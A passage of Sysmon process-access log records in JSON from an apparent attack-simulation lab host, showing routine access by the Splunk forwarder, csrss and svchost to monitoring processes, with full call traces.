Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6266,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.930\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0425-5F25-0000-00104C8E0B00}\r\nTargetProcessId: 4604\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.930","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0425-5F25-0000-00104C8E0B00}","TargetProcessId":"4604","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6267,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.930\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0425-5F25-0000-00104C8E0B00}\r\nTargetProcessId: 4604\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.930","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0425-5F25-0000-00104C8E0B00}","TargetProcessId":"4604","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6268,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6269,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6270,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6271,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6272,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6273,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:53.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:53.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
